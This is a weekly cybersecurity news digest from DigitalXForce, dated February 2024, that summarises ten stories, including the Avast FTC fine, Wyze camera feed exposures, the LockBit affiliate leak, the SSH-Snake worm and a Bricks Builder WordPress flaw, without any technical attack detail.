Welcome to the Cyber Watch series for today, February 23, 2024. At DigitalXForce, our Cyber Intelligence team curates a list of the latest cybersecurity news to keep you informed of stories that matter every week.
This week’s Cyber Watch top 10 list is a compilation of stories from 50+ relevant news sources across the web – all ranked according to the risk impact. We encourage you to review these stories and take steps to protect your organization. Click on each headline to read the full story.
FTC Fines Avast $16.5M Over Deceptive Data Privacy Practices
The U.S. Federal Trade Commission has cracked down on popular antivirus provider Avast for deceiving users about its data privacy protections. The FTC levied a $16.5 million fine against Avast for selling users’ sensitive browsing histories to advertisers through its Jumpshot subsidiary, despite claiming its software blocked online tracking.
The regulatory body accused Avast of unfairly collecting and selling users’ web searches, locations, and other personal information without proper consent. Avast also failed to disclose that data buyers could associate the browsing data with additional information to track users. The deceptive practices came to light in 2020 after investigations revealed Avast was supplying data to over 100 third parties.
Major web browsers consequently removed Avast extensions for spyware. Now, the FTC fine bans Avast from selling browsing data for ads and orders it to notify impacted users. The privacy violations allegedly occurred from 2014 onwards, with Jumpshot claiming access to 100 million devices. Following the backlash, Avast wound down Jumpshot’s operations.
Wyze Cameras Expose Users’ Feeds in Repeat Privacy Breach
Affordable home security camera maker Wyze is facing backlash after a technical glitch exposed customers’ private camera feeds to other users for the second time in five months. Last Friday, a Wyze outage caused by an AWS partner issue led to around 13,000 users receiving incorrect camera thumbnails and clips when service was restored.
Wyze said a third-party caching library had mixed up device and user IDs, allowing approximately 1,500 customers to potentially view complete event videos from strangers’ cameras. The company immediately blocked its Events tab and added login verification. This privacy breach echoes a similar incident last September when a caching error made 2,300 users’ feeds viewable for 40 minutes.
Wyze had claimed to fix the problems, but customers are frustrated by the repeated failures. Some have already raised concerns over Wyze’s handling of previously disclosed security vulnerabilities. The two breaches within months have severely damaged trust in Wyze’s ability to safeguard sensitive customer footage.
Healthcare Vendor Hack Exposes Data of 2.4 Million Patients
A major healthcare data breach has impacted nearly 2.4 million patients after hackers infiltrated the network of Medical Management Resource Group, an Arizona-based administrative services provider for ophthalmology practices. The November cyberattack against MMRG, which does business as American Vision Partners, involved the theft of sensitive patient information including names, contact details, birthdates, medical records, and social security numbers.
MMRG works with about a dozen eye care practices across multiple states. This incident underscores the data security risks posed when third-party vendors like MMRG get breached, potentially exposing millions of patients. In 2022, around 40% of major health data breaches involved hacked business associates like medical transcription services and billing companies.
The MMRG hack again highlights the need for healthcare entities to vet vendor cybersecurity controls and risk management.
UK’s NCA Exposes Nearly 200 LockBit Ransomware Affiliates
In the latest revelation following the takedown of notorious ransomware gang LockBit, authorities have exposed close to 200 of the group’s criminal affiliates. The leaked data from inside LockBit’s affiliate portal revealed 187 ransomware operators registered between early 2022 to February 2024.
These affiliates bought into LockBit’s ransomware-as-a-service model to deploy its malware against victims in exchange for a share of extorted payments. Law enforcement including the UK’s National Crime Agency have been steadily releasing insider information after compromising LockBit’s infrastructure this week.
Previously, the authorities published LockBit’s source code and details on its custom data theft tool StealBit. Now, the exposing of nearly 200 affiliates deals a further blow by revealing more individuals involved with the syndicate’s global ransomware operations.
Officials have warned the named affiliates that they are being watched and could face legal action soon. The NCA also defaced LockBit’s portal, telling affiliates that authorities have obtained data on their ransomware attacks, victims and money extorted. This coordinated effort by law enforcement worldwide aims to completely unravel LockBit’s intricate web.
Hackers Deploy Open Source SSH Worm Tool Against 100 Orgs
A recently released open-source pentesting tool called SSH-Snake is being exploited by hackers to target networks across hundreds of organizations. Security firm Sysdig reports that threat actors are using SSH-Snake, which has worm-like capabilities, to harvest SSH credentials and move laterally after initial access via Confluence flaws.
SSH-Snake was designed to automatically traverse networks using stolen SSH keys and map dependencies. However, it acts as a worm, self-replicating to spread across systems. Sysdig observed attackers deploying SSH-Snake to steal credentials, IP addresses, and bash histories from over 100 victims so far.
SSH-Snake evades detection better than other SSH malware by avoiding scripted attack patterns. While intended for ethical hacking purposes, SSH-Snake appeals to criminals with its stealth and reliability in reaching deep into breached networks.
Billions of Android Users Face WiFi Hotspot Hacking Risk
A new WiFi vulnerability affecting over 2 billion Android devices worldwide enables hackers to create fake clones of trusted WiFi networks to intercept user data. The flaw lies in the popular open-source wpa_supplicant software, used to secure WiFi connections. It tricks users into connecting to a hacker’s malicious network instead of the real one.
Hackers can easily obtain network names to clone by walking around buildings and scanning. Another flaw in Intel’s Linux home WiFi software allows unauthorized access to protected networks, putting devices and data at risk. Hackers can fully compromise home WiFi to steal sensitive information or infect devices.
Both issues are fixed in updated software but Android users must wait for security patches. Experts urge users to manually configure saved Enterprise network certificates as a stopgap.
Critical WordPress Theme RCE Flaw Puts 25,000 Sites at Risk
A severe vulnerability has been discovered in the popular Bricks Builder WordPress theme, used by over 25,000 websites. The flaw allows hackers to remotely execute malicious code without credentials, rated 9.8 out of 10 in severity. Security researcher ‘snicco’ uncovered the issue and responsibly disclosed it to Patchstack’s bug bounty program.
However, within days exploitation attempts were detected from several IP addresses. The vulnerability affects all Bricks Builder versions before 1.9.6.1. It enables the takeover of an entire site by injecting PHP code. The ease-of-use of the theme has made it widespread among developers. But its popularity has now become a security risk.
Researchers urge users to update immediately, as post-exploit compromise is still possible even after patching. The Bricks team quickly responded by releasing version 1.9.6.1. This security update fixes the root cause, but checking for signs of breach is still vital. The flaw highlights the dangers of supply chain attacks.
OWASP Releases Guide to Securely Implement AI Tools
The Open Web Application Security Project (OWASP) has published a checklist to help organizations safely leverage large language models (LLMs). As the adoption of AI accelerates, the 32-page document aids chief information security officers in governance and risk mitigation. It outlines a framework for secure AI deployment, from reviewing resilience strategies to choosing the right solutions.
Author Sandy Dunn says generative AI requires a completely different security mindset to address the asymmetric warfare of vastly broad attack surfaces. The guide covers business, risk management, and policy measures holistically while keeping legal details high-level.
Steps include threat modeling, monitoring risks, validation processes, and specialized security training. OWASP plans further work on an AI collaboration hub and standards alignment. Overall, the resource represents a milestone in coalescing guidance, says OWASP’s John Sotiropoulos.
Hackers Impersonate SendGrid Email Provider to Target SMBs
Cybercriminals are exploiting the trust in email service SendGrid to craft convincing phishing scams against small businesses, Kaspersky researchers warn. By hijacking client mailing lists, hackers send fraudulent emails that appear to come from the legitimate provider. The scam prompts users to “enhance security” by enabling two-factor authentication, redirecting to a fake login page where credentials are stolen.
This attack is especially insidious since the emails originate from a trusted source and bypass traditional filters. Security expert Roman Dedenok explains that scammers learn to mimic reliable services, making proper email validation and cybersecurity solutions crucial.
The report reveals phishers often compromise older, established accounts that have already sent bulk mail, leveraging their perceived trustworthiness. Kaspersky advises staff training, anti-phishing protections, and endpoint security to mitigate such business email compromise threats.
US Issues Guidance on Securing Water Systems from Cyber Threats
The US government has released guidance detailing actions water and wastewater entities should take to boost resilience against escalating cyber risks. The recommendations aim to help secure critical infrastructure like treatment facilities from potentially devastating attacks.
Key measures include reducing internet exposure of operational tech, regularly assessing vulnerabilities, improving password practices, inventorying exposed assets, timely patching prioritizing known exploited bugs, and conducting cyber awareness training. Additional steps advise regular backups stored offline, removal of default passwords, and multi-factor authentication implementation. The guidance highlights utilizing free resources like CISA’s specialized vulnerability scanner for water utilities.
The urgent call to action comes as cyber threats loom over essential water systems impacting public health and safety. Sophisticated ransomware and nation-state groups increasingly target the sector’s industrial control systems. Implementing baseline security hygiene like the recommended actions is critical for water companies to avoid disruptive incidents. The guidance was jointly published by CISA, EPA, and FBI to help utilities and local governments improve cyber resilience.
That’s all for today. Stay tuned for our next episode. See you next week!